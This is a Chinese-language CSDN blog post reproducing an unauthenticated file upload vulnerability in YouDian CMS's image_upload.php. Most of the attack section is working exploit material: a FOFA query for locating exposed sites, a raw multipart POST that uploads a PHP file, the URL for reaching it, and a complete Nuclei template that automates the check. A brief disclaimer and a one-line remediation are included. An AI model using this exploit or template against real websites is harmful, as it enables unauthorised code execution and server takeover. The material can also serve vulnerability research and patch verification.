友点CMS image_upload.php 文件上传漏洞

最新推荐文章于 2024-04-03 00:15:00 发布
最新推荐文章于 2024-04-03 00:15:00 发布
阅读量1k 收藏 7
点赞数 29
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52204925/article/details/136203629
版权
文章讲述了友点CMS网站管理系统中image_upload.php接口存在的文件上传漏洞,攻击者可借此上传恶意文件获取服务器权限。提供POC和Nuclei-POC示例,强调了设置接口访问控制和升级到安全版本的重要性。
摘要由CSDN通过智能技术生成

免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

Ⅰ、漏洞描述

友点CMS是一款高效且灵活的网站管理系统,它为用户提供了简单易用的界面和丰富的功能。无论是企业还是个人,都能通过友点CMS快速搭建出专业且美观的网站。该系统支持多种内容类型和自定义模板,方便用户按需调整。同时,它具备强大的SEO功能,能提升网站在搜索引擎中的排名。友点CMS还支持多语言设置,适应国际化需求。总的来说,友点CMS是网站建设的理想选择,既高效又易用。

友点CMS建站系统image_upload.php 接口处存在文件上传漏洞,恶意攻击者可能会利用此漏洞上传恶意文件,从而获取服务器权限。

Ⅱ、fofa语句

app="友点建站-CMS"

Ⅲ、漏洞复现

POC

POST /Public/ckeditor/plugins/multiimage/dialogs/image_upload.php HTTP/1.1
Host: 127.0.0.1
Content-Type: multipart/form-data;boundary=----WebKitFormBoundarydAPjrmyKewWuf59H
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 0

------WebKitFormBoundarydAPjrmyKewWuf59H
Content-Disposition: form-data; name="files"; filename="ceshi.php"
Content-Type: image/jpg
 
<?php echo md5('666');unlink(__FILE__);?>
------WebKitFormBoundarydAPjrmyKewWuf59H--

1、构建poc

2、访问

http://127.0.0.1/Public/image/uploads/1708478710775.php

 

Ⅳ、Nuclei-POC

id: Youdian-CMS-uploadfile

info:
  name: 友点CMS建站系统image_upload.php 接口处存在文件上传漏洞,恶意攻击者可能会利用此漏洞上传恶意文件,从而获取服务器权限。
  author: WLF
  severity: high
  metadata: 
    fofa-query: app="友点建站-CMS"
variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{to_lower(rand_base(20))}}"
http:
  - raw:
      - |
        POST /Public/ckeditor/plugins/multiimage/dialogs/image_upload.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data;boundary=----WebKitFormBoundarydAPjrmyKewWuf59H
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
        Content-Length: 0

        ------WebKitFormBoundarydAPjrmyKewWuf59H
        Content-Disposition: form-data; name="files"; filename="{{filename}}.php"
        Content-Type: image/jpg
        
        <?php echo md5('666');unlink(__FILE__);?>
        ------WebKitFormBoundarydAPjrmyKewWuf59H--

      - |
        GET /Public/image/uploads/{{path}}.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0

    extractors:
      - type: regex
        name: path
        group: 1
        regex:
           - 'image/uploads/(\w*)\.php'
        internal: true

    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"fae0b27c451c728867a567e8c1bb4e53")

Ⅴ、修复建议

设置接口访问控制,升级至安全版本

Love Seed
关注
  • 29
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
YouDianCMS 友点系统 CKEditor 任意文件上传
qq_36334672的博客
03-04 1185
友点CMS存在任意文件上传漏洞,攻击者通过漏洞可以上传恶意文件,获取服务器权限。
友点CMS GetSpecial SQL注入漏洞复现
m0_52514790的博客
02-21 728
友点CMS GetSpecial SQL注入漏洞复现
友点建站系统image_upload.php存在文件上传漏洞
最新发布
qq_36334672的博客
04-03 325
友点CMS建站系统image_upload.php 接口处存在文件上传漏洞,未经身份认证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
代码审计之youdiancms最新版getshell漏洞1
08-03
代码审计之youdiancms最新版getshell漏洞1
快排CMS-文件上传漏洞
LYJ20010728的博客
06-21 1635
快排CMS-文件上传漏洞环境搭建漏洞复现漏洞点一漏洞点二漏洞点三漏洞点四漏洞点五漏洞点六漏洞分析 环境搭建 下载快排cms,下载地址 使用phpstudy搭建web环境 把下载好的源码放到网站根目录下,开启phpstudy,浏览器访问安装后即可 漏洞复现 漏洞点一 漏洞点二 漏洞点三 漏洞点四 漏洞点五 漏洞点六 漏洞分析 ...
youdiancms(友点cms)漏洞
weixin_50464560的博客
08-28 3380
前言 在近期的授权项目中,遇到了一个目标,使用了youdiancms,需要获取权限,进而进行审计,本次代码审计过程先发现SQL注入漏洞,继续审计发现getshell的漏洞,本文将本次审计过程书写下来,仅作为学习研究,请勿用作非法用途。 0x01 未授权SQL注入首先拿到源码一看,发现该系统是基于THINKPHP3开发的。 在App/Lib/Action/HomeBaseAction.class.php:16 cookie可控,然后赋值给了$this->_fromUser 跟踪一下$this->
PHP代码审计』SemCms2.0存在文件上传漏洞
Ho1aAs‘s Blog
06-09 750
文章目录前言一、漏洞演示二、漏洞分析三、利用四、修复五、总结完 前言 作者:Ho1aAs 博客:https://blog.csdn.net/xxy605 一、漏洞演示 访问后台的上传接口 xxxx_admin/SEMCMS_upload.php 新建文件aaaaa.php <?php phpinfo();?> 上传 文件成功上传 二、漏洞分析 查看SEMCMS_upload.php源码,上传文件用到SEMCMS_Upfile.php <?php include_once 'S
【代码审计】BootCMS v1.1.3 文件上传漏洞分析
12-03 632
  0x00 环境准备 BootCMS官网:http://www.kilofox.net 网站源码版本:BootCMS v1.1.3  发布日期:2016年10月17日 程序源码下载:http://www.kilofox.net/download-v1-1-3 测试网站首页:   0x01 代码分析 1、漏洞文件位置:/application/classes/contro...
tu_加载_tu_tu.php_tu.php文件_苹果_
09-29
tu.php 解决图片显示失败问题,将tu.php放到苹果CMS根目录下,即可解决图片加载不出来的问题。
PHP_JTBC_CMS.tar.gz_CMS + PHP_JTBC_cms php_php cms
09-23
一个很厉害的CMS系统,值得学习,全开源
yecao.rar_cms_www. yecao_www.yecao_yecao网站_日yecao
09-14
野草网站全站CMS,一个很不错的建站软件,虽然有点早,但是还是很实用的
General_Bate_CMS_V3.1.0.9.T.20190306.rar
03-18
《通用版雄迈CMS V3.1.0.9.T.20190306:视频管理系统详解》 雄迈CMS(Central Management System),是...通过安装文件"General_Bate_CMS_V3.1.0.9.T.20190306.exe",用户可以轻松地体验到这一先进系统的强大功能。
PHP_JTBC_CMS.zip_afraiddab_cms_jtbc cms dal_jtbc cms用户
09-23
一套可对现有模块进行扩充与克隆的网站系统核心,采用UTF-8编码,采取 语言-代码-程序两两分离的技术模式,全面使用了模板包与语言包结构,为用户的修改提供方便,网站内容的每一个角落都可以在后台予以管理,是一套...
besscms开源框架v3.4文件上传漏洞绕过&小迪安全第51天代码审计
qq_63855540的博客
10-01 458
besscms开源框架v3.4文件上传漏洞绕过&小迪安全第51天代码审计
PHPCMS最新版任意文件上传漏洞分析
zimuxin的专栏
09-22 4185
工具:火狐插件hackbar 前几天就听朋友说PHPCMS最新版出了几个洞,有注入还有任意文件上传,注入我倒不是很惊讶,因为phpcms只要拿到了authkey注入就一大堆…… 任意文件上传倒是很惊讶,但是小伙伴并没有给我exp,今天看到了EXP,但是没有详细分析,那我就自己分析一下好啦。 首先去官网下一下最新版的程序,搭建起来。 为了方便各位小伙伴复现,这里附上最新版的下
友点 CMS V9.1 后台登录绕过 GetShell
Nginxx的博客
11-30 3192
友点 CMS V9.1 后台登录绕过 GetShell ,攻击者可无需任意权限即可登录后台并 getshell
漏洞复现|youdiancms 9.5.0 版本 SQL注入 (CVE-2022-32300)
weixin_50791426的博客
11-26 3029
友点企业网站管理系统(简称YouDianCMS系统)集PC站、手机站、微网站、多端小程序(微信、百度、抖音/头条、支付宝、QQ、360小程序)、APP于一体,共用空间,数据同步,是国内开源十站合一优秀企业建站解决方案。通过 /App/Lib/Action/Admin/MailAction.class.php 中的 MailSendID 参数发现 YoudianCMS v9.5.0 包含 SQL 注入漏洞。易受攻击的URL为:/index.php/Admin/mail/viewLog?
CMS系统漏洞分析溯源(第7题)
weixin_47493074的博客
10-01 274
CMS系统漏洞分析溯源(第7题)
if(frame_rx.can_id == 0x31){ geometry_msgs::Twist real_motion; int16_t vel_cms = 0; double vel_ms = 0; int16_t angle_deg_100 = 0; double angle_rad = 0; vel_cms = ((frame_rx.data[1] << 8) & 0xffff) | frame_rx.data[0]; angle_deg_100 = (((frame_rx.data[3] << 8) & 0xffff) | frame_rx.data[2]); vel_ms = (double)vel_cms / param_vc; angle_rad = (double)angle_deg_100 / 100.0 * (M_PI / 180.0); real_motion.linear.x = vel_ms; real_motion.angular.z = angle_rad; motion_pub.publish(real_motion); }
02-20
| frame_rx.data[0]) / 100; vel_ms = vel_cms / 100; angle_deg_100 = ((frame_rx.data[3] << 8) | frame_rx.data[2]) / 100; angle_rad = angle_deg_100 * 0.01;实际运动的速度cms = ((frame_rx.data[1] << 8) | frame_rx.data[0]) / 100,速度ms = vel_cms / 100,角度deg_100 = ((frame_rx.data[3] << 8) | frame_rx.data[2]) / 100,角度rad = angle_deg_100 * 0.01。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值